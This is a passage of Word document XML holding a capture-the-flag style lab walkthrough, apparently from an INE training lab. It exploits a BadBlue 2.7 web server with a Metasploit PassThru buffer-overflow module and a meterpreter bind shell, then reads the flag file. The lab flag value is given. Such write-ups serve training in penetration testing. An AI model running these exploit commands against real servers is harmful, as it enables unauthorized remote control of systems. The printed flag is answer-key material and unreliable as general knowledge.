      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>HTTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> 2.7, a Windows-based web server. We will search the exploit module for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> 2.7 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950E342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2F2B6419" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> 2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EABD625" w14:textId="645FF256" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE0B95D" wp14:editId="3401E59B">
            <wp:extent cx="5772447" cy="1987652"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1323805522" name="Picture 3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05522" name="Picture 39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12B9" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">There is a Metasploit module for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> server. We will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>PassThu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> remote buffer overflow Metasploit module to exploit the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55320F68" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85FE91" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83EF32" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>use exploit/windows/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>badblue_passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F7C2801" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69179C35" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>set RHOSTS demo2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D08208" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F195282" w14:textId="012626CC" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FAB1EAD" wp14:editId="024B67BB">
            <wp:extent cx="5778797" cy="2984653"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2417223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22350" name="Picture 2417223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9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2AC1" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>We have successfully exploited the target vulnerable application (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>badblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve">) and received a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E980CAC" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> Searching the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B052A" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71FE91" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733FC023" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBAF925" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172CA8">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72F4F926" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>type flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B07189F" w14:textId="6B764AFF" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="0034129C" w:rsidP="00172CA8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34280D73" wp14:editId="34897B05">
            <wp:extent cx="5200917" cy="4457929"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1422920234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20234" name="Picture 4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624E" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:t>This reveals the flag to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F01C4E" w14:textId="77777777" w:rsidR="00172CA8" w:rsidRPr="00172CA8" w:rsidRDefault="00172CA8" w:rsidP="00172CA8">
      <w:r w:rsidRPr="00172CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00172CA8">
        <w:t> c46d12f28d87ae0b92b05ebd9fb8e817</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6A02F" w14:textId="4E4BF113" w:rsidR="00172CA8" w:rsidRDefault="0034129C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526C529F" wp14:editId="34EB429E">
            <wp:extent cx="3892750" cy="590580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2033727048" name="Picture 42" descr="A blue surface with white sp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27048" name="Picture 42" descr="A blue surface with white spot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5FA8" w14:textId="77777777" w:rsidR="00331361" w:rsidRDefault="00331361"/>
    <w:sectPr w:rsidR="00331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DB"/>
    <w:rsid w:val="00172CA8"/>
    <w:rsid w:val="00331361"/>
    <w:rsid w:val="0034129C"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00BC19DB"/>
    <w:rsid w:val="00E7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A093B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{12BA3CFF-194F-4BBA-B4DE-051E7A49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581</Words>
  <Characters>3289</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>84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2025-10-17T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T05:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>